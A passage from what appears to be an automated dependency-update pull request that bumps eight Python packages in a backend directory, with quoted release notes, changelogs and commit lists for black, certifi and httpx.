bump","group_name":"pip","update_count":8,"packages":[{"name":"black","old_version":"24.3.0","new_version":"25.1.0","repository_url":"https://github.com/psf/black"},{"name":"certifi","old_version":"2024.7.4","new_version":"2025.6.15","repository_url":"https://github.com/certifi/python-certifi"},{"name":"httpx","old_version":"0.23.0","new_version":"0.28.1","repository_url":"https://github.com/encode/httpx"},{"name":"idna","old_version":"3.7","new_version":"3.10","repository_url":"https://github.com/kjd/idna"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"pydantic","old_version":"1.10.13","new_version":"2.11.7","repository_url":"https://github.com/pydantic/pydantic"},{"name":"starlette","old_version":"0.40.0","new_version":"0.47.1","repository_url":"https://github.com/encode/starlette"},{"name":"virtualenv","old_version":"20.26.6","new_version":"20.31.2","repository_url":"https://github.com/pypa/virtualenv"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 8 updates in the /backend directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [black](https://github.com/psf/black) | `24.3.0` | `25.1.0` |\n| [certifi](https://github.com/certifi/python-certifi) | `2024.7.4` | `2025.6.15` |\n| [httpx](https://github.com/encode/httpx) | `0.23.0` | `0.28.1` |\n| [idna](https://github.com/kjd/idna) | `3.7` | `3.10` |\n| [py](https://github.com/pytest-dev/py) | `1.10.0` | `1.11.0` |\n| [pydantic](https://github.com/pydantic/pydantic) | `1.10.13` | `2.11.7` |\n| [starlette](https://github.com/encode/starlette) | `0.40.0` | `0.47.1` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `20.26.6` | `20.31.2` |\n\n\nUpdates `black` from 24.3.0 to 25.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/releases\"\u003eblack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e25.1.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cp\u003eThis release introduces the new 2025 stable style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4558\"\u003e#4558\u003c/a\u003e), stabilizing\nthe following changes:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNormalize casing of Unicode escape characters in strings to lowercase (\u003ca href=\"https://redirect.github.com/psf/black/issues/2916\"\u003e#2916\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix inconsistencies in whether certain strings are detected as docstrings (\u003ca href=\"https://redirect.github.com/psf/black/issues/4095\"\u003e#4095\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConsistently add trailing commas to typed function parameters (\u003ca href=\"https://redirect.github.com/psf/black/issues/4164\"\u003e#4164\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove redundant parentheses in if guards for case blocks (\u003ca href=\"https://redirect.github.com/psf/black/issues/4214\"\u003e#4214\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd parentheses to if clauses in case blocks when the line is too long (\u003ca href=\"https://redirect.github.com/psf/black/issues/4269\"\u003e#4269\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eWhitespace before \u003ccode\u003e# fmt: skip\u003c/code\u003e comments is no longer normalized (\u003ca href=\"https://redirect.github.com/psf/black/issues/4146\"\u003e#4146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix line length computation for certain expressions that involve the power operator (\u003ca href=\"https://redirect.github.com/psf/black/issues/4154\"\u003e#4154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCheck if there is a newline before the terminating quotes of a docstring (\u003ca href=\"https://redirect.github.com/psf/black/issues/4185\"\u003e#4185\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix type annotation spacing between \u003ccode\u003e*\u003c/code\u003e and more complex type variable tuple (\u003ca href=\"https://redirect.github.com/psf/black/issues/4440\"\u003e#4440\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe following changes were not in any previous release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRemove parentheses around sole list items (\u003ca href=\"https://redirect.github.com/psf/black/issues/4312\"\u003e#4312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneric function definitions are now formatted more elegantly: parameters are\nsplit over multiple lines first instead of type parameter definitions (\u003ca href=\"https://redirect.github.com/psf/black/issues/4553\"\u003e#4553\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix formatting cells in IPython notebooks with magic methods and starting or trailing\nempty lines (\u003ca href=\"https://redirect.github.com/psf/black/issues/4484\"\u003e#4484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix crash when formatting \u003ccode\u003ewith\u003c/code\u003e statements containing tuple generators/unpacking\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4538\"\u003e#4538\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix/remove string merging changing f-string quotes on f-strings with internal quotes\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4498\"\u003e#4498\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCollapse multiple empty lines after an import into one (\u003ca href=\"https://redirect.github.com/psf/black/issues/4489\"\u003e#4489\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent \u003ccode\u003estring_processing\u003c/code\u003e and \u003ccode\u003ewrap_long_dict_values_in_parens\u003c/code\u003e from removing\nparentheses around long dictionary values (\u003ca href=\"https://redirect.github.com/psf/black/issues/4377\"\u003e#4377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMove \u003ccode\u003ewrap_long_dict_values_in_parens\u003c/code\u003e from the unstable to preview style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4561\"\u003e#4561\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eStore license identifier inside the \u003ccode\u003eLicense-Expression\u003c/code\u003e metadata field, see\n\u003ca href=\"https://peps.python.org/pep-0639/\"\u003ePEP 639\u003c/a\u003e. (\u003ca href=\"https://redirect.github.com/psf/black/issues/4479\"\u003e#4479\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up the \u003ccode\u003eis_fstring_start\u003c/code\u003e function in Black's tokenizer (\u003ca href=\"https://redirect.github.com/psf/black/issues/4541\"\u003e#4541\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eIntegrations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eIf using stdin with \u003ccode\u003e--stdin-filename\u003c/code\u003e set to a force excluded path, stdin won't be\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/blob/main/CHANGES.md\"\u003eblack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e25.1.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cp\u003eThis release introduces the new 2025 stable style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4558\"\u003e#4558\u003c/a\u003e), stabilizing the following\nchanges:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNormalize casing of Unicode escape characters in strings to lowercase (\u003ca href=\"https://redirect.github.com/psf/black/issues/2916\"\u003e#2916\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix inconsistencies in whether certain strings are detected as docstrings (\u003ca href=\"https://redirect.github.com/psf/black/issues/4095\"\u003e#4095\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConsistently add trailing commas to typed function parameters (\u003ca href=\"https://redirect.github.com/psf/black/issues/4164\"\u003e#4164\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove redundant parentheses in if guards for case blocks (\u003ca href=\"https://redirect.github.com/psf/black/issues/4214\"\u003e#4214\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd parentheses to if clauses in case blocks when the line is too long (\u003ca href=\"https://redirect.github.com/psf/black/issues/4269\"\u003e#4269\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eWhitespace before \u003ccode\u003e# fmt: skip\u003c/code\u003e comments is no longer normalized (\u003ca href=\"https://redirect.github.com/psf/black/issues/4146\"\u003e#4146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix line length computation for certain expressions that involve the power operator\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4154\"\u003e#4154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCheck if there is a newline before the terminating quotes of a docstring (\u003ca href=\"https://redirect.github.com/psf/black/issues/4185\"\u003e#4185\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix type annotation spacing between \u003ccode\u003e*\u003c/code\u003e and more complex type variable tuple (\u003ca href=\"https://redirect.github.com/psf/black/issues/4440\"\u003e#4440\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe following changes were not in any previous release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRemove parentheses around sole list items (\u003ca href=\"https://redirect.github.com/psf/black/issues/4312\"\u003e#4312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneric function definitions are now formatted more elegantly: parameters are split\nover multiple lines first instead of type parameter definitions (\u003ca href=\"https://redirect.github.com/psf/black/issues/4553\"\u003e#4553\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix formatting cells in IPython notebooks with magic methods and starting or trailing\nempty lines (\u003ca href=\"https://redirect.github.com/psf/black/issues/4484\"\u003e#4484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix crash when formatting \u003ccode\u003ewith\u003c/code\u003e statements containing tuple generators/unpacking\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4538\"\u003e#4538\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix/remove string merging changing f-string quotes on f-strings with internal quotes\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4498\"\u003e#4498\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCollapse multiple empty lines after an import into one (\u003ca href=\"https://redirect.github.com/psf/black/issues/4489\"\u003e#4489\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent \u003ccode\u003estring_processing\u003c/code\u003e and \u003ccode\u003ewrap_long_dict_values_in_parens\u003c/code\u003e from removing\nparentheses around long dictionary values (\u003ca href=\"https://redirect.github.com/psf/black/issues/4377\"\u003e#4377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMove \u003ccode\u003ewrap_long_dict_values_in_parens\u003c/code\u003e from the unstable to preview style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4561\"\u003e#4561\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eStore license identifier inside the \u003ccode\u003eLicense-Expression\u003c/code\u003e metadata field, see\n\u003ca href=\"https://peps.python.org/pep-0639/\"\u003ePEP 639\u003c/a\u003e. (\u003ca href=\"https://redirect.github.com/psf/black/issues/4479\"\u003e#4479\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up the \u003ccode\u003eis_fstring_start\u003c/code\u003e function in Black's tokenizer (\u003ca href=\"https://redirect.github.com/psf/black/issues/4541\"\u003e#4541\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eIntegrations\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/8a737e727ac5ab2f1d4cf5876720ed276dc8dc4b\"\u003e\u003ccode\u003e8a737e7\u003c/code\u003e\u003c/a\u003e Prepare release 25.1.0 (\u003ca href=\"https://redirect.github.com/psf/black/issues/4563\"\u003e#4563\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/d330deea00e199b99dea59fb4643305408c19a9b\"\u003e\u003ccode\u003ed330dee\u003c/code\u003e\u003c/a\u003e docs: We're not going to use backslashes for the with statement (\u003ca href=\"https://redirect.github.com/psf/black/issues/4564\"\u003e#4564\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/3d8129001f13e8c1a50eb73d8f44d26ad48f9c8c\"\u003e\u003ccode\u003e3d81290\u003c/code\u003e\u003c/a\u003e Move \u003ccode\u003ewrap_long_dict_values_in_parens\u003c/code\u003e to the preview style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4561\"\u003e#4561\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/459562c71a725a0a58a7cb710bd4b68417df4496\"\u003e\u003ccode\u003e459562c\u003c/code\u003e\u003c/a\u003e Improve function declaration wrapping when it contains generic type definitio...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/99dbf3006b30dd77a0f650b25d9b1c8071f25e1e\"\u003e\u003ccode\u003e99dbf30\u003c/code\u003e\u003c/a\u003e Cache executor to avoid hitting open file limits (\u003ca href=\"https://redirect.github.com/psf/black/issues/4560\"\u003e#4560\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/c0b92f3888a004b95e4626d8007a4b259b8f444f\"\u003e\u003ccode\u003ec0b92f3\u003c/code\u003e\u003c/a\u003e Prepare the 2025 stable style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4558\"\u003e#4558\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/e58baf15b99e0202f10bda09447d3eb246e88df9\"\u003e\u003ccode\u003ee58baf1\u003c/code\u003e\u003c/a\u003e Add test for \u003ca href=\"https://redirect.github.com/psf/black/issues/1187\"\u003e#1187\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/psf/black/issues/4559\"\u003e#4559\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/1455ae47311facfaf3ad62d2c223d86ae95c5c68\"\u003e\u003ccode\u003e1455ae4\u003c/code\u003e\u003c/a\u003e Fix docs CI (\u003ca href=\"https://redirect.github.com/psf/black/issues/4555\"\u003e#4555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/584d0331c8a73785af8a78fa601c540f5fe7bea2\"\u003e\u003ccode\u003e584d033\u003c/code\u003e\u003c/a\u003e fix: Don't remove parenthesis around long dictionary values (\u003ca href=\"https://redirect.github.com/psf/black/issues/4377\"\u003e#4377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/black/commit/6e9654065ca5e4b7c7a9491431a6cd7bc4016da3\"\u003e\u003ccode\u003e6e96540\u003c/code\u003e\u003c/a\u003e Fix CI (\u003ca href=\"https://redirect.github.com/psf/black/issues/4551\"\u003e#4551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/black/compare/24.3.0...25.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2024.7.4 to 2025.6.15\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e767d5938eddddf804216cec93a55c85129c5f2d\"\u003e\u003ccode\u003ee767d59\u003c/code\u003e\u003c/a\u003e 2025.06.15 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/357\"\u003e#357\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3e7076557d66b598fcca462e422dc988f09a6802\"\u003e\u003ccode\u003e3e70765\u003c/code\u003e\u003c/a\u003e Bump actions/setup-python from 5.5.0 to 5.6.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/9afd2ff407b8a0638988c952a6636b8dd623af7c\"\u003e\u003ccode\u003e9afd2ff\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.2.1 to 4.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/d7c816cbc9cf621b3ddc8cd7fa7eda3f36982620\"\u003e\u003ccode\u003ed7c816c\u003c/code\u003e\u003c/a\u003e remove code that's no longer required that 3.7 is our minimum (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/351\"\u003e#351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/189961379209973abd0dd6304297f03e2359e1b9\"\u003e\u003ccode\u003e1899613\u003c/code\u003e\u003c/a\u003e Declare setuptools as the build backend in pyproject.toml (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/350\"\u003e#350\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c8741423d67e1025c0bdad5225ded05cf962f207\"\u003e\u003ccode\u003ec874142\u003c/code\u003e\u003c/a\u003e update CI for ubuntu 20.04 deprecation (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/348\"\u003e#348\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/275c9eb55733a464589c15fb4566fddd4598e5b2\"\u003e\u003ccode\u003e275c9eb\u003c/code\u003e\u003c/a\u003e 2025.04.26 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/347\"\u003e#347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/37883310b51e56570919cdc2d44becc1c6940559\"\u003e\u003ccode\u003e3788331\u003c/code\u003e\u003c/a\u003e Bump actions/setup-python from 5.4.0 to 5.5.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/346\"\u003e#346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/9d1f1b782000baedf57026de5b79e193bcb7ef7b\"\u003e\u003ccode\u003e9d1f1b7\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.9 to 4.2.1 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/344\"\u003e#344\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/96b97a5afe26bc1adef98cb0bfe68e34948a73b6\"\u003e\u003ccode\u003e96b97a5\u003c/code\u003e\u003c/a\u003e Bump actions/upload-artifact from 4.6.1 to 4.6.2 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/343\"\u003e#343\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2024.07.04...2025.06.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `httpx` from 0.23.0 to 0.28.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/encode/httpx/releases\"\u003ehttpx's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.28.1\u003c/h2\u003e\n\u003ch2\u003e0.28.1 (6th December, 2024)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SSL case where \u003ccode\u003everify=False\u003c/code\u003e together with client side certificates.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 0.28.0\u003c/h2\u003e\n\u003ch2\u003e0.28.0 (28th November, 2024)\u003c/h2\u003e\n\u003cp\u003eThe 0.28 release includes a limited set of deprecations.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e:\u003c/p\u003e\n\u003cp\u003eWe are working towards a simplified SSL configuration API.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFor users of the standard \u003ccode\u003everify=True\u003c/code\u003e or \u003ccode\u003everify=False\u003c/code\u003e cases, or \u003ccode\u003everify=\u0026lt;ssl_context\u0026gt;\u003c/code\u003e case this should require no changes. The following cases have been deprecated...\u003c/em\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003everify\u003c/code\u003e argument as a string argument is now deprecated and will raise warnings.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecert\u003c/code\u003e argument is now deprecated and will raise warnings.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eOur revised \u003ca href=\"https://github.com/encode/httpx/blob/HEAD/docs/advanced/ssl.md\"\u003eSSL documentation\u003c/a\u003e covers how to implement the same behaviour with a more constrained API.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eThe following changes are also included\u003c/strong\u003e:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe deprecated \u003ccode\u003eproxies\u003c/code\u003e argument has now been removed.\u003c/li\u003e\n\u003cli\u003eThe deprecated \u003ccode\u003eapp\u003c/code\u003e argument has now been removed.\u003c/li\u003e\n\u003cli\u003eJSON request bodies use a compact representation. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3363\"\u003e#3363\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReview URL percent escape sets, based on WHATWG spec. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3371\"\u003e#3371\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/encode/httpx/issues/3373\"\u003e#3373\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure \u003ccode\u003ecertifi\u003c/code\u003e and \u003ccode\u003ehttpcore\u003c/code\u003e are only imported if required. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3377\"\u003e#3377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTreat \u003ccode\u003esocks5h\u003c/code\u003e as a valid proxy scheme. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3178\"\u003e#3178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCleanup \u003ccode\u003eRequest()\u003c/code\u003e method signature in line with \u003ccode\u003eclient.request()\u003c/code\u003e and \u003ccode\u003ehttpx.request()\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3378\"\u003e#3378\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix: When passing \u003ccode\u003eparams={}\u003c/code\u003e, always strictly update rather than merge with an existing querystring. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3364\"\u003e#3364\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 0.27.2\u003c/h2\u003e\n\u003ch2\u003e0.27.2 (27th August, 2024)\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReintroduced supposedly-private \u003ccode\u003eURLTypes\u003c/code\u003e shortcut. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/2673\"\u003e#2673\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 0.27.1\u003c/h2\u003e\n\u003ch2\u003e0.27.1 (27th August, 2024)\u003c/h2\u003e\n\u003ch2\u003eAdded\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for \u003ccode\u003ezstd\u003c/code\u003e content decoding using the python \u003ccode\u003ezstandard\u003c/code\u003e package is added. Installable using \u003ccode\u003ehttpx[zstd]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3139\"\u003e#3139\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eImproved error messaging for \u003ccode\u003eInvalidURL\u003c/code\u003e exceptions. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3250\"\u003e#3250\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eapp\u003c/code\u003e type signature in \u003ccode\u003eASGITransport\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3109\"\u003e#3109\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/encode/httpx/blob/master/CHANGELOG.md\"\u003ehttpx's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.28.1 (6th December, 2024)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SSL case where \u003ccode\u003everify=False\u003c/code\u003e together with client side certificates.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.28.0 (28th November, 2024)\u003c/h2\u003e\n\u003cp\u003eBe aware that the default \u003cem\u003eJSON request bodies now use a more compact representation\u003c/em\u003e. This is generally considered a prefered style, tho may require updates to test suites.\u003c/p\u003e\n\u003cp\u003eThe 0.28 release includes a limited set of deprecations...\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e:\u003c/p\u003e\n\u003cp\u003eWe are working towards a simplified SSL configuration API.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eFor users of the standard \u003ccode\u003everify=True\u003c/code\u003e or \u003ccode\u003everify=False\u003c/code\u003e cases, or \u003ccode\u003everify=\u0026lt;ssl_context\u0026gt;\u003c/code\u003e case this should require no changes. The following cases have been deprecated...\u003c/em\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003everify\u003c/code\u003e argument as a string argument is now deprecated and will raise warnings.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecert\u003c/code\u003e argument is now deprecated and will raise warnings.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eOur revised \u003ca href=\"https://github.com/encode/httpx/blob/master/docs/advanced/ssl.md\"\u003eSSL documentation\u003c/a\u003e covers how to implement the same behaviour with a more constrained API.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eThe following changes are also included\u003c/strong\u003e:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe deprecated \u003ccode\u003eproxies\u003c/code\u003e argument has now been removed.\u003c/li\u003e\n\u003cli\u003eThe deprecated \u003ccode\u003eapp\u003c/code\u003e argument has now been removed.\u003c/li\u003e\n\u003cli\u003eJSON request bodies use a compact representation. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3363\"\u003e#3363\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReview URL percent escape sets, based on WHATWG spec. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3371\"\u003e#3371\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/encode/httpx/issues/3373\"\u003e#3373\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure \u003ccode\u003ecertifi\u003c/code\u003e and \u003ccode\u003ehttpcore\u003c/code\u003e are only imported if required. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3377\"\u003e#3377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTreat \u003ccode\u003esocks5h\u003c/code\u003e as a valid proxy scheme. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3178\"\u003e#3178\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCleanup \u003ccode\u003eRequest()\u003c/code\u003e method signature in line with \u003ccode\u003eclient.request()\u003c/code\u003e and \u003ccode\u003ehttpx.request()\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3378\"\u003e#3378\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix: When passing \u003ccode\u003eparams={}\u003c/code\u003e, always strictly update rather than merge with an existing querystring. (\u003ca href=\"https://redirect.github.com/encode/httpx/issues/3364\"\u003e#3364\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.27.2 (27th August, 